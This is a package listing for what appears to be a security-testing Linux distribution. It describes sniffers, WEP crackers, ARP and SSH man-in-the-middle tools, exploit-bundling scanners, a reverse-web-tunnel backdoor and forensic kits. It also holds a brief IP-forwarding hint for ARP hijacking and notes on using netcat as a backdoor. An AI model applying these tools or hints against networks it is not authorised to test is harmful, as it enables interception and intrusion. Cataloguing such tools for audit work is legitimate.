Tools Listing

Package

Version

Description

          Description: wireless WEP cracker
 aircrack is an 802.11 WEP cracking program that can recover a 40-bit
 or 104-bit WEP key once enough encrypted packets have been gathered.
 It implements the standard FMS attack along with some optimizations,
 thus making the attack much faster compared to other WEP cracking tools.

	  

          Description: sends IP and/or ARP pings (to the MAC address)
 The arping utility sends ARP and/or ICMP requests to the specified host
 and displays the replies. The host may be specified by its hostname,
 its IP address, or its MAC address.
 .
 This program is only able to run as root. Make it setuid if you like.

	  

          Description: Empirical stochastic bandwidth tester
 Bing is a point-to-point bandwidth measurement tool (hence the 'b'),
 based on ping.
 .
 Bing determines the real (raw, as opposed to available or average)
 throughput on a link by measuring ICMP echo requests' round trip times
 for different packet sizes at each end of the link.
 .
 Website: http://fgouget.free.fr/bing/bing_src-readme-1st.shtml

	  

          Description: Utilities for configuring the Linux ethernet bridge
 This package contains utilities for configuring the Linux ethernet
 bridge in Linux 2.4 or later. The Linux ethernet bridge can be used
 for connecting multiple ethernet devices together. The connecting is
 fully transparent: hosts connected to one ethernet device see hosts
 connected to the other ethernet devices directly.

	  

          Description: NT SAM password recovery utility
 This little program provides a way to view information and
 change user passwords in a Windows NT/2000 userdatabase file.
 Old passwords need not be known since they are overwritten.
 In addition it also contains a simple registry editor
 (same size data writes) and an hex-editor which enables you to
 fiddle around with bits and bytes in the file as you wish.
 .
 If you want GNU/Linux bootdisks for offline password recovery
 you can add this utility to custom image disks or use those provided
 at the tools homepage.
 .
 Homepage: http://home.eunet.no/~pnordahl/ntpasswd/

	  

          N/A
	  

          Description: Checks dns zone information using nameserver lookups
 This program analyzes any DNS zone you specify, and reports any problems it
 finds by displaying errors and warnings.  Then it descends recursively to
 examine all zones below the given one (this can be disabled with a command-
 line option).
 .
 You don't have to feed any BIND conffiles to Dlint. Dlint uses
 nameserver calls to gather information.
 .
 Designed for Unix, dlint is written in Bourne Shell and Perl.
 .
 You may try it online at http://www.domtools.com/dns/dlint.shtml
 (this server imposes a timeout period; to lint a big zone, you should
 install dlint yourself and use it locally - that's what this package is for).

	  

          Description: Various tools to sniff network traffic for cleartext insecurities
 This package contains several tools to listen to and create network traffic:
 .
  * arpspoof - Send out unrequested (and possibly forged) arp replies.
  * dnsspoof - forge replies to arbitrary DNS address / pointer queries
               on the Local Area Network.
  * dsniff - password sniffer for several protocols.
  * filesnarf - saves selected files sniffed from NFS traffic.
  * macof - flood the local network with random MAC addresses.
  * mailsnarf - sniffs mail on the LAN and stores it in mbox format.
  * msgsnarf - record selected messages from different Instant Messengers.
  * sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
  * sshow - SSH traffic analyser
  * tcpkill - kills specified in-progress TCP connections.
  * tcpnice - slow down specified TCP connections via "active"
              traffic shaping.
  * urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
  * webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
  * webspy - sends URLs sniffed from a client to your local browser.
 .
 Please do not abuse this software.

	  

          Description: A little tool to send magic Wake-on-LAN packets
 You can wake up WOL compliant Computers which have been powered down to
 sleep mode or start WOL compliant Computers with a BIOS feature.
 .
 WOL is an abbreviation for Wake-on-LAN. It is a standard that allows you
 to turn on a computer from another location over a network connection.
 .
 etherwake also supports WOL passwords.

	  

          Description: sends ICMP ECHO_REQUEST packets to network hosts
 fping is a ping like program which uses the Internet Control Message Protocol
 (ICMP) echo request to determine if a target host is responding.  fping
 differs from ping in that you can specify any number of targets on the command
 line, or specify a file containing the lists of targets to ping.  Instead of
 sending to one target until it times out or replies, fping will send out a
 ping packet and move on to the next target in a round-robin fashion.
 .
 Homepage http://www.fping.com/

	  

          Description: Test a NIDS by attempting to evade using fragmented packets
 Fragrouter is aimed at testing the correctness of a NIDS, according
 to the specific TCP/IP attacks listed in the Secure Networks NIDS
 evasion paper. ``Insertion, Evasion, and Denial of Service: Eluding
 Network Intrusion Detection.''  It does this by routing network
 traffic in such a way as to elude most network intrusion detection
 systems.

	  

          Description: GTK-based LDAP client
 GQ is GTK+ LDAP client and browser utility. It can be used
 for searching LDAP directory as well as browsing it using a
 tree view. Features include:
  - browse and search modes
  - LDAPv3 schema browser
  - edit and delete entries
  - add entries with templates
  - export subtree or whole server to LDIF file
  - use any number of servers
  - search based on single argument or LDAP filter
  - TLS support for LDAPv3
  - SASL support
  - Support for userPassword including SSHA and SMD5 encryption.
  - I18N support
  - Support for graphical jpegPhoto display
  - Support to to view X509 certificates and X509 certificate revocation
    lists (CRLs)

	  

          Description: Honeyd's honeypot documentation and scripts
 Honeyd is a small daemon that creates virtual hosts on a network,
 including OS fingerprinting personality and simulation of services
 that are simulated by scripts.
 .
 This package provides honeyd's documentation and a number of scripts
 useful to simulate services of different UNIX and Windows operating
 systems: smtp, pop3, ftp, telnet, web server, ssh...
 .
 Homepage: http://www.honeyd.org

	  

          Description: Active Network Smashing Tool
 hping2 is a network tool able to send custom ICMP/UDP/TCP packets and
 to display target replies like ping does with ICMP replies. It handles
 fragmentation and arbitrary packet body and size, and can be used to
 transfer files under supported protocols. Using hping2, you can test
 firewall rules, perform (spoofed) port scanning, test network
 performance using different protocols, do path MTU discovery, perform
 traceroute-like actions under different protocols, fingerprint remote
 operating systems, audit TCP/IP stacks, etc.
 .
 Homepage: http://www.hping.org/

	  

          Description: Tunnels a data stream in HTTP requests.
 Creates a bidirectional virtual data stream tunnelled in
 HTTP requests. The requests can be sent via a HTTP proxy
 if so desired.

	  

          Description: Advanced packet sniffer and connection intrusion
 Hunt is a program for intruding into a connection, watching it and
 resetting it.
 .
 Note that as hunt is operating on Ethernet, it is best used for connections
 which can be watched through it. However, it is possible to do something
 even for hosts on another segments or hosts that are on switched ports.

	  

          Description: Interpret ICMP messages
 Icmpinfo is a tool for looking at the ICMP messages received on the running
 host.  It can be used to detect and record 'bombs' as well as various network
 problems.

	  

          Description: ICMP packet builder
 icmpush is a tool that builds ICMP packets fully customized
 from command line.
 .
 It supports the following ICMP error types: Redirect, Source
 Quench, Time Exceeded, Destination Unreach and Parameter
 Problem.
 .
 And the following ICMP information types: Address Mask Request,
 Timestamp, Information Request, Echo Request, Router Solicitation
 and Router Advertisement.

	  

          Description: A tool for testing network intrusion detection systems.
 idswakeup is a Bourne shell script invoking hping2 (required) and iwu
 (part of this package) to generate false alarms in order to check if
 a network intrusion detection system works all right.
 .
 idswakeup requires no configuration and includes many common attack
 simulations.

	  

          Description: Tcpdump-like utility that prints detailed header information
 Ipgrab is a network debugging utility not unlike tcpdump except
 that it prints out detailed header field information for
 data link, network and transport layers.

	  

          Description: IP Subnet Calculator for console
 The IP Subnet Calculator is a tool that allows network administrators
 to make calculations that will assist in subnetting a network.  You
 give the network class and subnet bits and you get back the maximum
 number of subnets, maximum number of hosts per subnet, a bimap showing
 the breakdown of network bits, subnet bits, and host bits, the decimal
 and hexadecimal class netmask, the decimal and hexadecimal subnet mask
 and lists subnets and host information. CIDR support and reverse
 engineer the network information for a particular interface (e.g. eth0,
 ppp0).

	  

          Description: Linux kernel 2.4+ iptables administration tools
 netfilter and iptables provide a Linux kernel framework for
 stateful and stateless packet filtering, network and port addresss
 translation, and other IP packet manipulation. The framework is the
 successor to ipchains.
 .
 netfilter and iptables are used in applications such as Internet
 connection sharing, firewalls, IP accounting, transparent proxying,
 advanced routing and traffic control.
 .
 iptables web site: http://www.iptables.org/

	  

          Description: LAN Information Server
 KDE is a powerful Open Source graphical desktop environment for Unix
 workstations. It combines ease of use, contemporary functionality, and
 outstanding graphical design with the technological superiority of the Unix
 operating system.
 .
 LISa is intended to provide a kind of "network neighborhood" but only relying
 on the TCP/IP protocol stack, no smb or whatever.
 .
 This package is part of the official KDE network module.

	  

          Description: TCP/IP Packet Injection Suite
 The Nemesis Project is designed to be a commandline-based, portable
 human IP stack for UNIX/Linux.  The suite is broken down by protocol
 and should allow for useful scripting of injected packet streams from
 simple shell scripts.
 .
 Key features:
  * support for ARP, DNS, ICMP, IGMP, OSPF, RIP, TCP, UDP protocols
  * layer 2 or layer 3 injection
  * packet payload from file
 .
 Homepage: http://www.packetfactory.net/Projects/nemesis/

	  

          Description: Net-Diagnostics (trafshow,strobe,netwatch,statnet,tcpspray,tcpblast)
 Netdiag contains a collection of small tools to analyze network traffic and
 configuration of remote hosts. It is of invaluable help if your
 system is showing strange network behaviour and you want to find out what
 your network is doing. The included tools are tcpblast, netload, trafshow,
 netwatch, strobe, statnet, and tcpspray.

	  

          Description: a package to manipulate BSD TCP/IP stream sockets
 NETPIPES 4 by Robert Forsman 
 The netpipes package makes TCP/IP streams usable in  shell
 scripts.   It  can  also  simplify  client/server  code by
 allowing the programmer to skip all the  tedious  program-
 ming  bits related to sockets and concentrate on writing a
 filter/service.

	  

          Description: grep for network traffic
 ngrep strives to provide most of GNU grep's common features,
 applying them to the network layer.  ngrep is a pcap-aware tool that
 will allow you to specify extended regular expressions to match
 against data payloads of packets.  It currently recognizes TCP, UDP
 and ICMP across Ethernet, PPP, SLIP and null interfaces, and
 understands bpf filter logic in the same fashion as more common
 packet sniffing tools, such as tcpdump and snoop.

	  

          Description: web server security scanner
 Nikto is a pluggable web server and CGI scanner written in Perl, using
 rfp's LibWhisker to perform fast security or informational checks.
 .
 Features:
  * Easily updatable CSV-format checks database
  * Output reports in plain text or HTML
  * Available HTTP versions automatic switching
  * Generic as well as specific server software checks
  * SSL support (through libnet-ssleay-perl)
  * Proxy support (with authentication)
  * Cookies support

	  

          Description: A realtime console network usage monitor
 Nload  is a console application which monitors network traffic and bandwidth
 usage in real time. It displays the total amount of data that has been
 transfered over a network device since the last reboot, the current  bandwidth
 usage,  and  the  minimum,  maximum,  and  average bandwidth usage measured
 since it started.
 .
 If the user wants, it is also able to display two bars, similar to  progress
 bars,  presenting the current load graphically. Support for displaying several
 devices simultaneously is included.

	  

          Description: The Network Mapper Front End
 nmapfe provides an X Window System (GTK+) front end for nmap.
 Written by Zach Smith, nmapfe is now maintained by Fyodor.

	  

          Description: Virtual Private Network daemon
 An application to securely tunnel IP networks over a single UDP or TCP port.
 It can be used to access remote sites, make secure point to point connnections,
 enhance WiFi security, etc.
 .
 OpenVPN uses all of the encryption, authentication, and certification features
 of the OpenSSL library (any cipher, key size, or HMAC digest).
 .
 OpenVPN may use static, pre-shared keys or TLS-based dynamic key exchange.  It
 also supports VPNs with dynamic endpoints (DHCP or dial-up clients), tunnels
 over NAT or connection-oriented stateful firewalls (like Linux's iptables).

	  

          Description: Unusual TCP/IP testing tools
 The Paketto Keiretsu is a collection of tools that use new and unusual
 strategies for manipulating TCP/IP networks. scanrand is said to be
 faster than nmap and more useful in some scenarios.
 .
 This package includes:
   * scanrand, a very fast port, host, and network trace scanner
   * minewt, a user space NAT/MAT (MAC Address Translation) gateway
   * linkcat(lc), that provides direct access to the network (Level 2)
   * paratrace, a "traceroute"-like tool using existing TCP connections
   * phentropy, that plots a large data source onto a 3D matrix

	  

          Description: Characterize the bandwidth, latency and loss on network links
 pchar is a reimplementation of the pathchar utility, written by Van
 Jacobson.  Both programs attempt to characterize the bandwidth,
 latency, and loss of links along an end-to-end path through the
 Internet.  pchar works in both IPv4 and IPv6 networks.

	  

          Description: Print IP address on a given range
 prips can be used to print all IP addresses of a specified range.
 This allows the enhancement of the usability of tools that have been
 created to work on only one host at a time (e.g. whois).

	  

          N/A
	  

          Description: Security Tool to audit remote systems
 Remote Access Session is a security tool to analyze the integrity of
 systems. The program tries to gain access to a system using the most
 advanced techniques of remote intrusion. It lets to work on normal mode
 (fast) and hard mode (more intensive). There is a big difference between
 "Remote Access Session" and other remote security audit tools: If
 "Remote Access Session" find a remote vulnerability that gives user account
 or root, it will try to exploit it and it will return a shell in order to
 discard false positives.
 .
 It is actually under development and it just has a few features of the
 future final version:
  *Advanced scanning capabilities. This tool doesn't block against
   firewall and it's fast.
  *Total service's banner info added: Includes web server detection
   version and named version, and the classical too (ftp, pop ...)
  *Writes reports with info of the host analyzed to the hard disk.
  *Remote OS detect feature with QueSO.
  *If detects any vulnerability, the tool chooses the right exploits
   based on version, vendor and OS of the services that run on the
   remote host and ask you on a interactive way if you want to run
   these exploits in order to check the real danger the remote host
   can receive and discard false positives. Includes 69 remote exploits
   for various OS and services.

	  

          Description: packet builder for testing IP protocols implementations.
 rain is a powerful packet builder for testing stability of hardware
 and software utilizing IP protocols. It offers its users the
 capability of fully customizing their own packets with a wide variety
 of command line options.

	  

          Description: get SSH server versions for an entire network
 The ScanSSH protocol scanner scans a list of addresses and networks for
 running SSH protocol servers and their version numbers.  Version 2.0 adds
 support for scanning arbitrary ports and specifically open proxies.  The
 ScanSSH protocol scanner supports random selection of IP addresses from
 large network ranges and is useful for gathering statistics on the
 deployment of SSH protocol servers in a company or the Internet as whole.

	  

          Description: a collection of SNMP command line management tools
 The scli package was written in order to have small and efficient command
 line utility to monitor and configure network devices and host systems. The
 scli package is based on the SNMP management protocol and it utilizes a
 MIB compiler called smidump to generate C stub code. In fact, virtually no
 SNMP knowledge is required in order to extend the scli programs with new
 features.
 .
 In other words, the slogan for this little package is:
 .
  "After more than 10 years of SNMP, I felt it is time for really useful
   command line SNMP monitoring and configuration tools. ;-)"
 .
 (description taken from upstream sources)
 .
 scli replaces the stools package

	  

          Description: A commandline tool to allow sending arbitrary IP packets
 SendIP has a large number of command line options to specify the
 content of every header of a RIP, TCP, UDP, ICMP or raw IPv4 and IPv6
 packet. It also allows any data to be added to the packet. Checksums
 can be calculated automatically, but if you wish to send out wrong
 checksums, that is supported too.

	  

          Description: A fully programmable ping replacement
 Sing is a little tool that sends ICMP packets fully customized from command
 line. The main purpose is to replace/complement the nice ping command
 with certain enhancements as:
  - Send fragmented packets (Linux and BSD).
  - Send monster packets > 65534 (Linux and BSD).
  - Send/read spoofed packets.(Libpcap included in distribution).
  - Send many ICMP Information types in addition to the ECHO REQUEST type
    sent by default as Address Mask Request, Timestamp, Information Request,
  - Router Solicitation and Router Advertisement.
  - Send many ICMP error types: Redirect, Source Quench, Time Exceeded,
    Destination Unreach and Parameter Problem.
  - Send to host with Loose or Strict Source Routing.
  - Use little fingerprinting techniques to discover Windows or Solaris
    boxes.
  - Send ICMP packets emulating certain OS: Cisco, Solaris, Linux, Shiva,
    Unix and Windows at the moment.

	  

          Description: Netbios Auditing Tool
 This tool can perform various security checks on remote
 servers running NetBIOS file sharing services. It
 is capable of enumerating shares and make break-in attempts
 using a (user-provided) list of users and passwords.

	  

          Description: a LanManager-like simple client for Unix
 The Samba software suite is a collection of programs that
 implements the SMB protocol for unix systems, allowing you to serve
 files and printers to Windows, NT, OS/2 and DOS clients. This protocol
 is sometimes also referred to as the LanManager or NetBIOS protocol.
 .
 This package contains some client components of the Samba suite. In
 particular it includes the command line utilities smbclient, smbtar,
 and smbspool. If you want to mount shares exported from Microsoft
 Windows machines or a Samba server you must install the smbfs package.

	  

          Description: packet sniffer and monitoring tool
 sniffit is a packet sniffer for TCP/UDP/ICMP packets.
 sniffit is able to give you very detailed technical info
 on these packets (SEC, ACK, TTL, Window, ...) but also
 packet contents in different formats (hex or plain text,
 etc. ).

	  

          Description: NET SNMP (Simple Network Management Protocol) Apps
 The Simple Network Management Protocol (SNMP) provides a framework
 for the exchange of management information between agents (servers)
 and clients.  The NET SNMP applications are a collection of command
 line clients for issuing SNMP requests to agents.

	  

          Description: An SSLv3/TLS network protocol analyzer
 This program will dump the traffic on a network and analyze it for
 SSLv3/TLS network traffic, typically used to secure TCP connections.
 When it identifies this traffic, it decodes the results.  When
 provided with the appropriate keying material, it will also decrypt
 the connections and display the application data traffic.
 .
 ssldump is based on tcpdump, a network monitoring and data acquisition
 tool.

	  

          Description: Universal SSL tunnel for network daemons
 The stunnel program is designed to work  as  SSL  encryption
 wrapper between remote client and local (inetd-startable) or
 remote server. The concept is that having non-SSL aware daemons
 running  on  your  system you can easily setup them to
 communicate with clients over secure SSL channel.
 .
 stunnel can be used to add  SSL  functionality  to  commonly
 used  inetd  daemons  like  POP-2,  POP-3  and  IMAP servers
 without any changes in the programs' code.

	  

          Description: A powerful tool for network monitoring and data acquisition
 This program allows you to dump the traffic on a network. tcpdump
 is able to examine IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS
 BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other packet
 types.
 .
 It can be used to print out the headers of packets on a network
 interface, filter packets that match a certain expression. You can
 use this tool to track down network problems, to detect "ping attacks"
 or to monitor network activities.
 .
 Further information is available at 

	  

          Description: TCP flow recorder
 tcpflow is a program that captures data transmitted as part of TCP
 connections (flows), and stores the data in a way that is convenient
 for protocol analysis or debugging. A program like 'tcpdump' shows a
 summary of packets seen on the wire, but usually doesn't store the
 data that's actually being transmitted. In contrast, tcpflow
 reconstructs the actual data streams and stores each flow in a
 separate file for later analysis.
 .
 tcpflow understands sequence numbers and will correctly reconstruct
 data streams regardless of retransmissions or out-of-order delivery.
 However, it currently does not understand IP fragments; flows
 containing IP fragments will not be recorded properly.
 .
 tcpflow is based on the LBL Packet Capture Library and therefore
 supports the same rich filtering expressions that programs like
 'tcpdump' support. tcpflow can also rebuild flows from data captured
 with 'tcpdump -w'.

	  

          Description: Tool to replay saved tcpdump files at arbitrary speeds
 Tcpreplay is aimed at testing the performance of a NIDS by
 replaying real background network traffic in which to hide
 attacks. Tcpreplay allows you to control the speed at which the
 traffic is replayed, and can replay arbitrary tcpdump traces. Unlike
 programmatically-generated artificial traffic which doesn't
 exercise the application/protocol inspection that a NIDS performs,
 and doesn't reproduce the real-world anomalies that appear on
 production networks (asymmetric routes, traffic bursts/lulls,
 fragmentation, retransmissions, etc.), tcpreplay allows for exact
 replication of real traffic seen on real networks.
 .
 https://sf.net/projects/tcpreplay/
 http://tcpreplay.sourceforge.net/

	  

          Description: extract pieces of and/or glue together tcpdump files
 Tcpslice is a program for extracting portions of packet-trace files
 generated using tcpdump(l)'s -w flag.
 It can also be used to glue together several such files.

	  

          Description: Incoming and Outgoing TCP/IP connections logger
 tcpspy is an administrator's tool that logs information
 about incoming and outgoing TCP/IP connections. It's
 written in C and uses no libpcap functions, unlike tcpdump.
 .
 Connections are selected for logging with rules, similarly
 to the filter expressions accepted by tcpdump. The
 following information is logged: username, local address
 and port, remote address and port, and, optionally, the
 executable filename.
 .
 At present, only the IPv4 protocol is supported.
 .
 The current URL for this project is
 http://the.wiretapped.net/security/network-monitoring/tcpspy/

	  

          Description: The telnet client with SSL encryption support
 The telnet command is used for interactive communication with another host
 using the TELNET protocol.
 .
 SSL telnet(d) replaces normal telnet(d) using SSL authentication and
 encryption. It interoperates with normal telnet(d) in both directions.
 It checks if the other side is also talking SSL, if not it falls back
 to normal telnet protocol.
 .
 Advantages over normal telnet(d): Your passwords and the data you send
 will not go in cleartext over the line. Nobody can get it with
 tcpdump or similar tools. With SSLtelnet you can also connect to
 https-server like https://www.netscape.com. Just do
 'telnet www.netscape.com 443'

	  

          Description: network traffic analyzer (console)
 Ethereal is a network traffic analyzer, or "sniffer", for Unix and
 Unix-like operating systems. A sniffer is a tool used to capture
 packets off the wire. Ethereal decodes numerous protocols (too many
 to list).
 .
 This package provides the console version of ethereal, named
 "tethereal".

	  

          Description: transparent network access through a SOCKS 4 or 5 proxy
 tsocks provides transparent network access through a SOCKS version 4
 or 5 proxy (usually on a firewall). tsocks intercepts the calls
 applications make to establish TCP connections and transparently
 proxies them as necessary. This allows existing applications to use
 SOCKS without recompilation or modification.

	  

          Description: Tunnel UDP packets over a TCP connection
 UDPTunnel is a small program which can tunnel UDP packets
 bi-directionally over a TCP connection. Its primary purpose (and
 original motivation) is to allow multi-media conferences to traverse
 a firewall which allows only outgoing TCP connections.

	  

          Description: CGI scanner to audit web servers
 Whisker is a state-of-the-art CGI scanner that can:
   - detect the running web server and perform only tests specific
     to that server and version
   - apply intrusion detection evasion methods
   - do brute force on accounts using HTTP-AUTH
   - use virtual hosts
   - run in multi-thread mode
 .
 It can output the information in different formats including
 HTML and nmap.

	  

          Description: Remote OS identification
 Xprobe2 allows you to determine what operating system is running on a
 remote host. It sends several packets to a host and analyses the
 returned answers.
 .
 Xprobe2's functionality is comparable to the OS fingerprinting feature
 in nmap (written by a different Fyodor):
  - Outputs its level of confidence about the OS on the remote host.
  - Remains usable even if intermediate systems (routers, firewalls) make
    slight modifications to the packets.
  - Can list the type of intermediate device (e.g. "Linux IP masquerading").
  - Modular architecture allows new fingerprinting tests and new OS
    signatures to be added.
 .
 Project homepage: 

	  

Package

Version

Description

          Description: WLAN sniffer
 A wireless LAN (WLAN) tool which cracks encryption keys on
 802.11b WEP networks. AirSnort operates by passively monitoring
 transmissions, computing the encryption key when enough packets
 have been gathered.
 .
 http://airsnort.shmoo.com/
 .
 https://sf.net/projects/airsnort/

          

          Description: Network swiss army knife
 Cheops is a combination of a variety of network tools to
 provide system administrators and users with a simple interface to
 managing and accessing their networks.  Cheops aims to
 do for the network what the file manager did for the filesystem.
 .
 Additionally, cheops has taken on the role of a network management system,
 in the same category as one might put HP Openview.
 .
 Homepage: http://www.marko.net/cheops/

          

          Description: graphical network monitor modeled after etherman
 EtherApe is an etherman clone. It displays network activity
 graphically. Active hosts are shown as circles of varying size,
 and traffic among them is shown as lines of varying width. It's
 Gnome and libpcap based.

          

          Description: network traffic analyser (common files)
 Ethereal is a network traffic analyzer, or "sniffer", for Unix and
 Unix-like operating systems. A sniffer is a tool used to capture
 packets off the wire. Ethereal decodes numerous protocols (too many
 to list).
 .
 This package provides files common to both ethereal (the GTK+ version)
 and tethereal (the console version).

          

          Description: GTK-based LDAP client
 GQ is GTK+ LDAP client and browser utility. It can be used
 for searching LDAP directory as well as browsing it using a
 tree view. Features include:
  - browse and search modes
  - LDAPv3 schema browser
  - edit and delete entries
  - add entries with templates
  - export subtree or whole server to LDIF file
  - use any number of servers
  - search based on single argument or LDAP filter
  - TLS support for LDAPv3
  - SASL support
  - Support for userPassword including SSHA and SMD5 encryption.
  - I18N support
  - Support for graphical jpegPhoto display
  - Support to to view X509 certificates and X509 certificate revocation
    lists (CRLs)

          

          Description: Tunnels a data stream in HTTP requests.
 Creates a bidirectional virtual data stream tunnelled in
 HTTP requests. The requests can be sent via a HTTP proxy
 if so desired.

          

          Description: Interactive Colorful IP LAN Monitor
 IPTraf is an ncurses-based IP LAN monitor that generates
 various network statistics including TCP info, UDP counts,
 ICMP and OSPF information, Ethernet load info, node stats,
 IP checksum errors, and others.

          

          Description: KDE Remote Desktop Client
 KDE is a powerful Open Source graphical desktop environment for Unix
 workstations. It combines ease of use, contemporary functionality, and
 outstanding graphical design with the technological superiority of the Unix
 operating system.
 .
 krdc is an KDE graphical client for the rfb Protocol, used by VNC,
 and if rdesktop is installed, krdc can connect to Windows Terminal
 Servers using RDP.
 .
 This package is part of the official KDE network module.

          

          Description: An SMB network browser for Linux and X11.
 This package allows users to browse SMB (e.g. Windows Network Neighborhood)
 networks under X, and mount/unmount SMB shared filesystems via a graphical
 interface.  It is somewhat more network-efficient that other similar tools
 because  it uses the proper protocol for identifying network shares rather
 than simply scanning IP address ranges.
 .
 In order for LinNeighborhood to work properly,  you must have the
 smbfs filesystem compiled into your kernel and have a working Samba
 setup.

          

          Description: Full screen ncurses and X11 traceroute tool
 mtr combines the functionality of the 'traceroute' and 'ping' programs
 in a single network diagnostic tool.
 .
 As mtr starts, it investigates the network connection between the host
 mtr runs on and a user-specified destination host.  After it
 determines the address of each network hop between the machines,
 it sends a sequence ICMP ECHO requests to each one to determine the
 quality of the link to each machine.  As it does this, it prints
 running statistics about each machine.

          

          Description: Remote network security auditor, the server
 The Nessus Security Scanner is a security auditing tool. It makes
 possible to test security modules in an attempt to find vulnerable
 spots that should be fixed.
 .
 It is made up of two parts: a server, and a client. The server/daemon,
 nessusd, is in charge of the attacks, whereas the client, nessus,
 provides the user a nice X11/GTK+ interface.
 .
 This package contains the nessusd server, which must be run as root.

          

          Description: NETwork DUmp data Displayer and Editor for tcpdump trace files
 It is a GUI-based tool that allows you to make detailed changes to
 packets in tcpdump trace files, in particular, it can currently do
 the following:
  * Set the value of any field in IP, TCP and UDP packet headers.
  * Copy, move and delete packets in the trace file.
  * Fragment and reassemble IP packets.
  * Netdude constantly communicates with a tcpdump process to update
    the familiar tcpdump output that corresponds to the trace. This
    also means that any changes made to your local version of tcpdump
    are reflected in Netdude.
  * Plugin architecture: people can easily add plugins for specific
    tasks. The code comes with a plugin for checksum correction in IP,
    TCP and UDP, and a dummy plugin.
  * Through the plugin mechanism, Netdude provides a good facility for
    writing tcpdump trace file filters.
  .
  http://netdude.sourceforge.net/

          

          Description: The Network Mapper Front End
 nmapfe provides an X Window System (GTK+) front end for nmap.
 Written by Zach Smith, nmapfe is now maintained by Fyodor.

          

          Description: Wireless Device Monitoring Application
 Wavemon allows you to watch signal and noise levels, packet
 statistics, device configuration and network parameters of your
 wireless network hardware.  It has currently only been tested with
 the Lucent Orinoco series of cards, although it *should* work (though
 with varying features) with all devices supported by the wireless
 kernel extensions by Jean Tourrilhes.

          

          Description: X11 tool for navigating SMB Networks
 xSMBrowser is a tool for navigating SMB Networks (Samba, SMB, CIFS).
 It retains the features of the program it was based upon (Microsoft's
 Network Neighborhood), but adds convenient features for Unix users.
 These include mounting, ability to change networks on-the-fly, and
 conveniences such as a Stop Button.
 .
 More information can be found at the xsmbrowser web site
 http://www.public.iastate.edu/~chadspen/ .

          

Package

Version

Description

Package Directory: /opt/Operator_Extras/Notes


Just some text and html files containing some how-to's and notes.
Directory Listing:

Firewalk-hping
	Discussion on using the firewalk utility. How you can further
	test your firewall rulebase.
firewalk-final_old.html
	Firewalk documentation
dcomrpc_notes
netcat.htm
	Netcat documentation
netcat_backdoor
	How to use netcat as a back door into a system
netcat_readme.txt
	Just that
netcat_and_cryptcat.pdf
	Good pdf on using the products
BGP-Vulnerability-Testing.html
	Just that
NTFS.txt
	Notes on using some of the installed tools to access Windows
	filesytems and change NT passwords and modify registry.
operator_notes
	Miscellaneous notes regarding operator
hostap_README
	Just that
        

Package Directory: /opt/Operator_Extras/Tools/misc


Directory of miscellaneous goods:

CGen.sh
	CGen.sh v0.1 by J. Barber
	simple little script that prints out a class c ip range
freemem
	Simple util to reclaim unused memory

hijack_rst.sh
	shell code using nemesis to send TCP resets 

shroud.sh
    	This code will respond to SYN request by sending a crafted SYN/ACK
	response packet back using nemesis. This will cause nmap -sS scans
	report all ports open.
	Haven't got this to work right

shroud2.sh
 	Same as shroud.sh but will send a banner back to the connection.
	Haven't got this to work right

Kreset.pl
	Used to reset a TCP connecting.
	(Using the slipping throught he window meathod described on 4-20-04)

dos2unix.pl
	Simple perl script to convert files from DOS to Unix format

ciscocrack
	Decrypts type 7 encrypted cisco passwd files.

PSTArpsniffer
	Arp Sniffer
        

Package Directory: /opt/Operator_Extras/Tools/lufs


LUFS is enabling you to mount into your file hierarchy a remote computer's 
file system, which is accessible by various means (ftp, ssh, etc.). Then, 
the access to the remote files will be completely network transparent. In 
other words, you'll be able to read/modify remote files as if they were local, 
watch movies/listen to MP3s from FTP/SSH/Gnutella servers without copying them 
locally. Sheer magic. 

        

Package Directory: /opt/Operator_Extras/Tools/rwtb


The Reverse-WWW-Tunnel-Backdoor is proof-of-concept Perl program for the 
paper "Placing Backdoors through Firewalls". It allows communicating with 
a shell through firewalls and proxy servers by imitating web traffic. The 
master/slave relation is reversed; therefore no listening ports are used 
on the target machine. 


        

Package Directory: /opt/Operator_Extras/Tools/ffp-008


Fuzzy Fingerprinting - Attacking vulnerabilities in the Human Brain
Fuzzy fingerprinting (ffp) is a technique that extends common man-in-the-middle
attacks by generating fingerprints that closely look like the target's public 
key fingerprint.
        

Package Directory: /opt/Operator_Extras/Tools/sbd-133


sbd is a Netcat-clone, designed to be portable and offer strong encryption. It
runs on Unix-like operating systems and on Microsoft Win32. sbd features
AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), arbitrary command
execution (-e option), choosing source port, continuous reconnection with
delay, and some other nice features. sbd supports TCP/IP communication only.

        

Package Directory: /opt/Operator_Extras/Tools/arpmim-02


ARP MITM attack tool. (c) xdr 2000
rewritten & enhanced by skyper 2001
Idea from scut's arptool - Requires Libnet 1.00.

Features:
- classic mim: redirect data from 1 host to 1 host via your host.
- redirect data from n hosts to 1 host via your host with specific ip:mac.
- redirect data from N/all hosts to 1 host via your host with just 
  1 packet every 10 seconds. We use broadcast mac with unicast 
  arp-information in the packet.
- redirect communication from n hosts to n hosts via your host
  with just n packets (and _not_ n*n as most(all?) existing arpmim tools.

Hints:
- dont forgett to enable forwarding:
  "echo 1 >/proc/sys/net/ipv4/ip_forward"
- dont use NAT/connection tracking while hijaking.
- configure your firewall (input, output, forward rules)

        

Package Directory: /opt/Operator_Extras/Tools/autopsy-203


The Autopsy Forensic Browser is a graphical interface to utilities
found in The Sleuth Kit, which are open source tools for the forensic
analysis of Microsoft and UNIX file systems.  It allows the allocated
and deleted files, directories, data units, and meta data of file
system images to be analyzed in a read-only environment.  Images
can be searched for strings and regular expressions to recover
deleted material.  It also allows one to create a detailed time
line of the Modified, Access, and Changed times of files.  Hash
databases are used to identify if a file is known to be good or
bad.  Files can also be organized based on their file type - instead
of just viewing them by directory listings.

Autopsy is HTML-based and uses a client-server model.  The Autopsy
server runs on many UNIX systems and the client can be any platform
with an HTML browser.  This enables one to create a flexible
environment with a central Autopsy server and several remote clients.
For incident response scenarios, a CD with The Sleuth Kit and
Autopsy can be created to allow the responder read-only remote
access to a suspect system from an HTML-browser on a trusted system.

Autopsy will not modify the original images and the integrity of the
images can be verified in Autopsy using MD5 values.

        

Package Directory: /opt/Operator_Extras/Tools/sleuthkit-172


The Sleuth Kit is an open source forensic toolkit for analyzing
Microsoft and UNIX file systems.  The Sleuth Kit enables investigators
